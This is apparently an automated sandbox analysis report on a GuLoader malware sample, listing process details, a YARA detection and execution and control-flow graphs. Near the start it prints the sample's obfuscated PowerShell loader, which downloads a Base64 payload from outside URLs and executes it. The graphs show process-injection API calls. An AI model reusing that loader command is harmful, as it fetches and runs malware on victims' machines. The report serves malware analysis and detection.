MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                                                        Imagebase:0xc0000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.890425117.00000000077B5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Has exited:false

                                                        Target ID:22
                                                        Start time:09:11:33
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                                                        Imagebase:0x4a630000
                                                        File size:302'592 bytes
                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:15.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:21.1%
                                                          Total number of Nodes:95
                                                          Total number of Limit Nodes:8
                                                          execution_graph 9864 257d08 9865 257d2f 9864->9865 9875 253fdd 9865->9875 9885 253fbd 9865->9885 9895 253d82 9865->9895 9905 253cc2 9865->9905 9915 2536c0 9865->9915 9925 25a0e0 9865->9925 9935 253f7a 9865->9935 9945 259669 9865->9945 9866 257e3a 9877 253fd3 9875->9877 9876 25a169 9876->9866 9877->9876 9884 258e48 WriteProcessMemory 9877->9884 9955 2591e0 9877->9955 9959 253358 9877->9959 9963 258af8 9877->9963 9967 258b00 9877->9967 9971 258a08 9877->9971 9975 258a10 9877->9975 9884->9877 9887 253fc2 9885->9887 9886 25a169 9886->9866 9887->9886 9888 258e48 WriteProcessMemory 9887->9888 9889 258a10 ResumeThread 9887->9889 9890 258a08 ResumeThread 9887->9890 9891 2591e0 CreateProcessA 9887->9891 9892 253358 CreateProcessA 9887->9892 9893 258b00 Wow64SetThreadContext 9887->9893 9894 258af8 Wow64SetThreadContext 9887->9894 9888->9887 9889->9887 9890->9887 9891->9887 9892->9887 9893->9887 9894->9887 9896 253d84 9895->9896 9897 25a169 9896->9897 9898 258e48 WriteProcessMemory 9896->9898 9899 258a10 ResumeThread 9896->9899 9900 258a08 ResumeThread 9896->9900 9901 258b00 Wow64SetThreadContext 9896->9901 9902 258af8 Wow64SetThreadContext 9896->9902 9903 2591e0 CreateProcessA 9896->9903 9904 253358 CreateProcessA 9896->9904 9897->9866 9898->9896 9899->9896 9900->9896 9901->9896 9902->9896 9903->9896 9904->9896 9907 253cc6 9905->9907 9906 25a169 9906->9866 9907->9906 9908 258a10 ResumeThread 9907->9908 9909 258a08 ResumeThread 9907->9909 9910 258b00 Wow64SetThreadContext 9907->9910 9911 258af8 Wow64SetThreadContext 9907->9911 9912 2591e0 CreateProcessA 9907->9912 9913 253358 CreateProcessA 9907->9913 9914 258e48 WriteProcessMemory 9907->9914 9908->9907 9909->9907 9910->9907 9911->9907 9912->9907 9913->9907 9914->9907 9916 2536c5 9915->9916 9917 25a169 9916->9917 9918 258a10 ResumeThread 9916->9918 9919 258a08 ResumeThread 9916->9919 9920 2591e0 CreateProcessA 9916->9920 9921 253358 CreateProcessA 9916->9921 9922 258b00 Wow64SetThreadContext 9916->9922 9923 258af8 Wow64SetThreadContext 9916->9923 9924 258e48 WriteProcessMemory 9916->9924 9917->9866 9918->9916 9919->9916 9920->9916 9921->9916 9922->9916 9923->9916 9924->9916 9927 259783 9925->9927 9926 25a169 9926->9866 9927->9926 9928 258e48 WriteProcessMemory 9927->9928 9929 258a10 ResumeThread 9927->9929 9930 258a08 ResumeThread 9927->9930 9931 2591e0 CreateProcessA 9927->9931 9932 253358 CreateProcessA 9927->9932 9933 258b00 Wow64SetThreadContext 9927->9933 9934 258af8 Wow64SetThreadContext 9927->9934 9928->9927 9929->9927 9930->9927 9931->9927 9932->9927 9933->9927 9934->9927 9937 253f7e 9935->9937 9936 25a169 9936->9866 9937->9936 9938 258e48 WriteProcessMemory 9937->9938 9939 258a10 ResumeThread 9937->9939 9940 258a08 ResumeThread 9937->9940 9941 2591e0 CreateProcessA 9937->9941 9942 253358 CreateProcessA 9937->9942 9943 258b00 Wow64SetThreadContext 9937->9943 9944 258af8 Wow64SetThreadContext 9937->9944 9938->9937 9939->9937 9940->9937 9941->9937 9942->9937 9943->9937 9944->9937 9946 259678 9945->9946 9947 25a169 9946->9947 9948 258a10 ResumeThread 9946->9948 9949 258a08 ResumeThread 9946->9949 9950 2591e0 CreateProcessA 9946->9950 9951 253358 CreateProcessA 9946->9951 9952 258b00 Wow64SetThreadContext 9946->9952 9953 258af8 Wow64SetThreadContext 9946->9953 9954 258e48 WriteProcessMemory 9946->9954 9947->9866 9948->9946 9949->9946 9950->9946 9951->9946 9952->9946 9953->9946 9954->9946 9956 259267 CreateProcessA 9955->9956 9958 2594c5 9956->9958 9958->9958 9960 25335d CreateProcessA 9959->9960 9962 2594c5 9960->9962 9964 258b01 Wow64SetThreadContext 9963->9964 9966 258bc7 9964->9966 9966->9877 9968 258b49 Wow64SetThreadContext 9967->9968 9970 258bc7 9968->9970 9970->9877 9972 258a54 ResumeThread 9971->9972 9974 258aa6 9972->9974 9974->9877 9976 258a54 ResumeThread 9975->9976 9978 258aa6 9976->9978 9978->9877

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 778 2536c0-259782 781 259783-259841 778->781 924 259844 call 2591e0 781->924 925 259844 call 253358 781->925 786 259846-259866 787 25988f-2598b8 786->787 788 259868-259884 786->788 791 2598bf-259904 787->791 792 2598ba 787->792 788->787 796 259906 791->796 797 25990b-259937 791->797 792->791 796->797 799 2599a1-2599db 797->799 800 259939-259974 797->800 805 259a04-259a0e 799->805 806 2599dd-2599f9 799->806 803 259976-259992 800->803 804 25999d-25999f 800->804 803->804 804->805 807 259a15-259a2d 805->807 808 259a10 805->808 806->805 810 259a34-259a70 807->810 811 259a2f 807->811 808->807 816 259a72-259a8e 810->816 817 259a99-259a9f 810->817 811->810 816->817 818 259ad1-259ad3 817->818 819 259aa1-259acf 817->819 820 259ad9-259aed 818->820 819->820 823 259b16-259b20 820->823 824 259aef-259b0b 820->824 825 259b27-259b4b 823->825 826 259b22 823->826 824->823 830 259b52-259bb5 825->830 831 259b4d 825->831 826->825 835 259bb7-259bd3 830->835 836 259bde-259c1f call 258e48 830->836 831->830 835->836 839 259c21-259c3d 836->839 840 259c48-259c52 836->840 839->840 841 259c54 840->841 842 259c59-259c66 840->842 841->842 845 259c6d-259c8b 842->845 846 259c68 842->846 849 259c92-259c9e 845->849 850 259c8d 845->850 846->845 851 259e5e-259e7a 849->851 850->849 852 259e80-259ea4 851->852 853 259ca3-259cae 851->853 857 259ea6 852->857 858 259eab-259ee9 call 258e48 852->858 854 259cb5-259cdc 853->854 855 259cb0 853->855 860 259ce3-259d0a 854->860 861 259cde 854->861 855->854 857->858 864 259f12-259f1c 858->864 865 259eeb-259f07 858->865 868 259d11-259d48 860->868 869 259d0c 860->869 861->860 866 259f23-259f50 864->866 867 259f1e 864->867 865->864 874 259f52-259f59 866->874 875 259f5a-259f63 866->875 867->866 876 259e2f-259e39 868->876 877 259d4e-259d5c 868->877 869->868 874->875 878 259f65 875->878 879 259f6a-259f7a 875->879 882 259e40-259e51 876->882 883 259e3b 876->883 880 259d63-259d6a 877->880 881 259d5e 877->881 878->879 886 259f81-259fb2 879->886 887 259f7c 879->887 888 259d71-259db9 880->888 889 259d6c 880->889 881->880 884 259e53 882->884 885 259e58 882->885 883->882 884->885 885->851 892 259fb4-259fca 886->892 893 25a01c-25a056 886->893 887->886 897 259dc0-259de3 call 258e48 888->897 898 259dbb 888->898 889->888 926 259fcd call 258b00 892->926 927 259fcd call 258af8 892->927 899 25a07f-25a08e 893->899 900 25a058-25a074 893->900 896 259fcf-259fef 902 259ff1-25a00d 896->902 903 25a018-25a01a 896->903 904 259de5-259e05 897->904 898->897 922 25a091 call 258a10 899->922 923 25a091 call 258a08 899->923 900->899 902->903 903->899 906 259e07-259e23 904->906 907 259e2e 904->907 906->907 907->876 908 25a093-25a0b3 909 25a0b5-25a0d1 908->909 910 25a0dc-25a144 908->910 909->910 917 25a146 910->917 918 25a14b-25a163 910->918 917->918 918->781 920 25a169-25a171 918->920 922->908 923->908 924->786 925->786 926->896 927->896
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375523062.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$
                                                          • API String ID: 0-332751201
                                                          • Opcode ID: 8dcdb8cee38c9d00537ac7bce240c894840edd1d76a709733ce52d8c43a830f5
                                                          • Instruction ID: 60002b715aa941b9272abe1d7a555f88e238c11e15b78ca76c35f8fbffb818a3
                                                          • Opcode Fuzzy Hash: 8dcdb8cee38c9d00537ac7bce240c894840edd1d76a709733ce52d8c43a830f5
                                                          • Instruction Fuzzy Hash: 1B520474E00229CFDB68DF69C894BDDBBB2BB89301F5481EA9409A7255DB305EC9CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 931 259669-2596a9 933 2596b0-259782 931->933 934 2596ab 931->934 936 259783-259841 933->936 934->933 1079 259844 call 2591e0 936->1079 1080 259844 call 253358 936->1080 941 259846-259866 942 25988f-2598b8 941->942 943 259868-259884 941->943 946 2598bf-259904 942->946 947 2598ba 942->947 943->942 951 259906 946->951 952 25990b-259937 946->952 947->946 951->952 954 2599a1-2599db 952->954 955 259939-259974 952->955 960 259a04-259a0e 954->960 961 2599dd-2599f9 954->961 958 259976-259992 955->958 959 25999d-25999f 955->959 958->959 959->960 962 259a15-259a2d 960->962 963 259a10 960->963 961->960 965 259a34-259a70 962->965 966 259a2f 962->966 963->962 971 259a72-259a8e 965->971 972 259a99-259a9f 965->972 966->965 971->972 973 259ad1-259ad3 972->973 974 259aa1-259acf 972->974 975 259ad9-259aed 973->975 974->975 978 259b16-259b20 975->978 979 259aef-259b0b 975->979 980 259b27-259b4b 978->980 981 259b22 978->981 979->978 985 259b52-259bb5 980->985 986 259b4d 980->986 981->980 990 259bb7-259bd3 985->990 991 259bde-259c1f call 258e48 985->991 986->985 990->991 994 259c21-259c3d 991->994 995 259c48-259c52 991->995 994->995 996 259c54 995->996 997 259c59-259c66 995->997 996->997 1000 259c6d-259c8b 997->1000 1001 259c68 997->1001 1004 259c92-259c9e 1000->1004 1005 259c8d 1000->1005 1001->1000 1006 259e5e-259e7a 1004->1006 1005->1004 1007 259e80-259ea4 1006->1007 1008 259ca3-259cae 1006->1008 1012 259ea6 1007->1012 1013 259eab-259ee9 call 258e48 1007->1013 1009 259cb5-259cdc 1008->1009 1010 259cb0 1008->1010 1015 259ce3-259d0a 1009->1015 1016 259cde 1009->1016 1010->1009 1012->1013 1019 259f12-259f1c 1013->1019 1020 259eeb-259f07 1013->1020 1023 259d11-259d48 1015->1023 1024 259d0c 1015->1024 1016->1015 1021 259f23-259f50 1019->1021 1022 259f1e 1019->1022 1020->1019 1029 259f52-259f59 1021->1029 1030 259f5a-259f63 1021->1030 1022->1021 1031 259e2f-259e39 1023->1031 1032 259d4e-259d5c 1023->1032 1024->1023 1029->1030 1033 259f65 1030->1033 1034 259f6a-259f7a 1030->1034 1037 259e40-259e51 1031->1037 1038 259e3b 1031->1038 1035 259d63-259d6a 1032->1035 1036 259d5e 1032->1036 1033->1034 1041 259f81-259fb2 1034->1041 1042 259f7c 1034->1042 1043 259d71-259db9 1035->1043 1044 259d6c 1035->1044 1036->1035 1039 259e53 1037->1039 1040 259e58 1037->1040 1038->1037 1039->1040 1040->1006 1047 259fb4-259fca 1041->1047 1048 25a01c-25a056 1041->1048 1042->1041 1052 259dc0-259de3 call 258e48 1043->1052 1053 259dbb 1043->1053 1044->1043 1081 259fcd call 258b00 1047->1081 1082 259fcd call 258af8 1047->1082 1054 25a07f-25a08e 1048->1054 1055 25a058-25a074 1048->1055 1051 259fcf-259fef 1057 259ff1-25a00d 1051->1057 1058 25a018-25a01a 1051->1058 1059 259de5-259e05 1052->1059 1053->1052 1077 25a091 call 258a10 1054->1077 1078 25a091 call 258a08 1054->1078 1055->1054 1057->1058 1058->1054 1061 259e07-259e23 1059->1061 1062 259e2e 1059->1062 1061->1062 1062->1031 1063 25a093-25a0b3 1064 25a0b5-25a0d1 1063->1064 1065 25a0dc-25a144 1063->1065 1064->1065 1072 25a146 1065->1072 1073 25a14b-25a163 1065->1073 1072->1073 1073->936 1075 25a169-25a171 1073->1075 1077->1063 1078->1063 1079->941 1080->941 1081->1051 1082->1051
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375523062.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$
                                                          • API String ID: 0-332751201
                                                          • Opcode ID: 27814c5c997e616246b9b16fc7b07c849d39992016612cc4dd481c4c6eeab212
                                                          • Instruction ID: f8a1b2bb0a640593e3babe8185b8abfcf827f8cb71ddf2a45505fb5f8e1308d8
                                                          • Opcode Fuzzy Hash: 27814c5c997e616246b9b16fc7b07c849d39992016612cc4dd481c4c6eeab212
                                                          • Instruction Fuzzy Hash: B832F474E10229CFDB68DF69C894BDDBBB2AF89301F5481EA9409A7254DB305EC9CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 871420-871445 1 871603-871637 0->1 2 87144b-871450 0->2 12 871647 1->12 13 871639-871645 1->13 3 871452-871458 2->3 4 871468-87146c 2->4 8 87145c-871466 3->8 9 87145a 3->9 5 8715b3-8715bd 4->5 6 871472-871474 4->6 14 8715bf-8715c8 5->14 15 8715cb-8715d1 5->15 10 871476-871482 6->10 11 871484 6->11 8->4 9->4 17 871486-871488 10->17 11->17 18 871649-87164b 12->18 13->18 19 8715d7-8715e3 15->19 20 8715d3-8715d5 15->20 17->5 21 87148e-871495 17->21 22 8716f4-8716fe 18->22 23 871651-871669 18->23 24 8715e5-871600 19->24 20->24 21->1 27 87149b-8714a0 21->27 25 871700-871706 22->25 26 871709-87170f 22->26 38 871744-87178c 23->38 39 87166f-871674 23->39 30 871715-871721 26->30 31 871711-871713 26->31 32 8714a2-8714a8 27->32 33 8714b8-8714c6 27->33 35 871723-871741 30->35 31->35 36 8714ac-8714b6 32->36 37 8714aa 32->37 33->5 45 8714cc-8714e9 33->45 36->33 37->33 51 87178e-87179a 38->51 52 87179c 38->52 43 871676-87167c 39->43 44 87168c-871696 39->44 46 871680-87168a 43->46 47 87167e 43->47 53 87169b-8716ac 44->53 45->5 67 8714ef-871514 45->67 46->44 47->44 56 87179e-8717a0 51->56 52->56 53->38 66 8716b2-8716b7 53->66 58 8717a6-8717a8 56->58 59 87185f-871869 56->59 64 8717c2-8717cb 58->64 65 8717aa-8717b0 58->65 62 871877-87187d 59->62 63 87186b-871874 59->63 68 871883-87188f 62->68 69 87187f-871881 62->69 74 8717cf-8717de 64->74 75 8717cd 64->75 70 8717b4-8717c0 65->70 71 8717b2 65->71 72 8716cf-8716f1 66->72 73 8716b9-8716bf 66->73 67->5 93 87151a-87151c 67->93 76 871891-8718ad 68->76 69->76 70->64 71->64 77 8716c3-8716cd 73->77 78 8716c1 73->78 84 8717e0-8717eb 74->84 85 8717ed-871833 74->85 75->74 77->72 78->72 88 871853-87185c 84->88 109 871835 85->109 110 87183f-871849 85->110 94 871536-871541 93->94 95 87151e-871524 93->95 100 871543-871549 94->100 101 871559-8715b0 94->101 97 871526 95->97 98 871528-871534 95->98 97->94 98->94 104 87154d-87154f 100->104 105 87154b 100->105 104->101 105->101 112 87183a 109->112 111 87184b 110->111 110->112 111->88 112->110
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'p$4'p$4:|$4:|$h%g$h%g$$p$$p$$p$$p$9|$9|
                                                          • API String ID: 0-3916544636
                                                          • Opcode ID: 44ea9c267d6f800f86167bcd11937dee748ac3e19d0235369c4ed6e195e7100b
                                                          • Instruction ID: 4198688ea680c9a9f5f9209294c1d4b5ac7138e1c06172404fcfe15dd636010c
                                                          • Opcode Fuzzy Hash: 44ea9c267d6f800f86167bcd11937dee748ac3e19d0235369c4ed6e195e7100b
                                                          • Instruction Fuzzy Hash: 5CC1E335B042419FCF189B6CD854A6AFBA2FFC4314B28C07AD949CB65ADB31CD42C7A1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 113 873a08-873a2b 114 873a31-873a36 113->114 115 873be9-873bfa 113->115 116 873a4e-873a52 114->116 117 873a38-873a3e 114->117 123 873bfc-873c09 115->123 121 873b90-873b9a 116->121 122 873a58-873a5a 116->122 119 873a42-873a4c 117->119 120 873a40 117->120 119->116 120->116 124 873b9c-873ba5 121->124 125 873ba8-873bae 121->125 126 873a5c-873a68 122->126 127 873a6a 122->127 123->123 129 873c0b-873c35 123->129 131 873bb4-873bc0 125->131 132 873bb0-873bb2 125->132 130 873a6c-873a6e 126->130 127->130 139 873dc1-873dcc 129->139 140 873c3b-873c40 129->140 130->121 133 873a74-873a78 130->133 135 873bc2-873be6 131->135 132->135 136 873a7a-873a96 133->136 137 873a98 133->137 142 873a9a-873a9c 136->142 137->142 157 873dd0-873dd3 139->157 143 873c42-873c48 140->143 144 873c58-873c5c 140->144 142->121 148 873aa2-873aa6 142->148 150 873c4c-873c56 143->150 151 873c4a 143->151 146 873c62-873c64 144->146 147 873d71-873d7b 144->147 152 873c66-873c72 146->152 153 873c74 146->153 158 873d7d-873d86 147->158 159 873d89-873d8f 147->159 155 873ab9 148->155 156 873aa8-873ab7 148->156 150->144 151->144 164 873c76-873c78 152->164 153->164 165 873abb-873abd 155->165 156->165 166 873dd4-873ddd 157->166 160 873d95-873da1 159->160 161 873d91-873d93 159->161 167 873da3-873dbe 160->167 161->167 164->147 168 873c7e-873c9d 164->168 165->121 169 873ac3-873ac5 165->169 166->157 170 873ddf-873de1 166->170 194 873c9f-873cab 168->194 195 873cad 168->195 173 873ac7-873acd 169->173 174 873adf-873af9 169->174 170->166 171 873de3-873e0b 170->171 180 873f62-873fa6 171->180 181 873e11-873e16 171->181 178 873ad1-873add 173->178 179 873acf 173->179 183 873afb-873afe 174->183 184 873b08-873b1e 174->184 178->174 179->174 226 873fb4-873fcc 180->226 227 873fa8-873faa 180->227 185 873e2e-873e32 181->185 186 873e18-873e1e 181->186 183->184 207 873b36-873b8d 184->207 208 873b20-873b26 184->208 192 873f0f-873f19 185->192 193 873e38-873e3a 185->193 190 873e22-873e2c 186->190 191 873e20 186->191 190->185 191->185 197 873f27-873f2d 192->197 198 873f1b-873f24 192->198 200 873e3c-873e48 193->200 201 873e4a 193->201 202 873caf-873cb1 194->202 195->202 205 873f33-873f3f 197->205 206 873f2f-873f31 197->206 210 873e4c-873e4e 200->210 201->210 202->147 204 873cb7-873cd6 202->204 229 873cee-873d0d 204->229 230 873cd8-873cde 204->230 212 873f41-873f5f 205->212 206->212 213 873b2a-873b2c 208->213 214 873b28 208->214 210->192 216 873e54-873e58 210->216 213->207 214->207 219 873e5a-873e76 216->219 220 873e78 216->220 222 873e7a-873e7c 219->222 220->222 222->192 228 873e82-873e95 222->228 237 873fd0-873fd2 226->237 238 873fce 226->238 227->226 240 873e9b-873e9d 228->240 247 873d14-873d62 229->247 248 873d0f-873d12 229->248 233 873ce2-873ce4 230->233 234 873ce0 230->234 233->229 234->229 241 873fdc-873fdd 237->241 238->241 242 873eb5-873f0c 240->242 243 873e9f-873ea5 240->243 245 873ea7 243->245 246 873ea9-873eab 243->246 245->242 246->242 250 873d67-873d6e 247->250 248->250
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$h%g$h%g
                                                          • API String ID: 0-751031107
                                                          • Opcode ID: d6a1ddd28a94b6a54a45f1fbca443cf5fbbd83db437f09a9bf9bb1288c6fee66
                                                          • Instruction ID: 67096efe234e0b846cf156580e5a67352e12115a72c615bd11b559e0b6a57b82
                                                          • Opcode Fuzzy Hash: d6a1ddd28a94b6a54a45f1fbca443cf5fbbd83db437f09a9bf9bb1288c6fee66
                                                          • Instruction Fuzzy Hash: 69F10331B043559FCB259A68C85066ABBE1FFC5310F28C0AAD449CB299DF31CE45E7A3

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 257 8752b4-8752b7 258 8752bd-8752c5 257->258 259 8752b9-8752bb 257->259 260 8752c7-8752cd 258->260 261 8752dd-8752e1 258->261 259->258 264 8752d1-8752da 260->264 265 8752cf 260->265 262 8752e2-8752e8 261->262 263 87540c-875416 261->263 266 8752fa-8752fe 262->266 267 8752ea-8752eb 262->267 268 875424-87542a 263->268 269 875418-875421 263->269 277 875267-875271 264->277 278 8752db-8752dc 264->278 265->261 275 875464-8754b3 266->275 276 875304-875309 266->276 271 8752ed-8752f7 267->271 272 87532b 267->272 273 875430-87543c 268->273 274 87542c-87542e 268->274 271->266 279 87532d-87532f 272->279 280 87543e-875461 273->280 274->280 291 8756b6-8756c3 275->291 292 8754b9-8754be 275->292 281 875321-875329 276->281 282 87530b-875311 276->282 278->261 279->263 283 875335-875339 279->283 281->279 287 875315-87531f 282->287 288 875313 282->288 283->263 290 87533f-875343 283->290 287->281 288->281 290->263 294 875349-87536f 290->294 295 8754d6-8754da 292->295 296 8754c0-8754c6 292->296 294->263 316 875375-875379 294->316 300 8754e0-8754e2 295->300 301 87565f-875669 295->301 298 8754ca-8754d4 296->298 299 8754c8 296->299 298->295 299->295 306 8754e4-8754f0 300->306 307 8754f2 300->307 303 875675-87567b 301->303 304 87566b-875672 301->304 309 875681-87568d 303->309 310 87567d-87567f 303->310 308 8754f4-8754f6 306->308 307->308 308->301 312 8754fc-87551b 308->312 313 87568f-8756b3 309->313 310->313 329 87551d-875529 312->329 330 87552b 312->330 319 87539c 316->319 320 87537b-875384 316->320 321 87539f-8753ac 319->321 322 875386-875389 320->322 323 87538b-875398 320->323 328 8753b2-875409 321->328 326 87539a 322->326 323->326 326->321 332 87552d-87552f 329->332 330->332 332->301 333 875535-875539 332->333 333->301 334 87553f-875543 333->334 335 875556 334->335 336 875545-875554 334->336 337 875558-87555a 335->337 336->337 337->301 338 875560-875564 337->338 338->301 339 87556a-875589 338->339 342 8755a1-8755ac 339->342 343 87558b-875591 339->343 346 8755ae-8755b1 342->346 347 8755bb-8755d7 342->347 344 875595-875597 343->344 345 875593 343->345 344->342 345->342 346->347 348 8755f4-8755fe 347->348 349 8755d9-8755ec 347->349 350 875602-875650 348->350 351 875600 348->351 349->348 352 875655-87565c 350->352 351->352
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (op$(op$L4p$L4p$L4p
                                                          • API String ID: 0-2509652690
                                                          • Opcode ID: abec5e876696a6899dd21f4c8d492d77db8eafb44af5b683f3681562e1fc5e0f
                                                          • Instruction ID: 0af71957bad12f13849f71a4c19c19c9d3822b9dc896ed40651199d48f3beb63
                                                          • Opcode Fuzzy Hash: abec5e876696a6899dd21f4c8d492d77db8eafb44af5b683f3681562e1fc5e0f
                                                          • Instruction Fuzzy Hash: 72C11B357046489FDF158F28C840BAEBBA2FF85311F68C469D919CB29ACBB1DC46C751

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
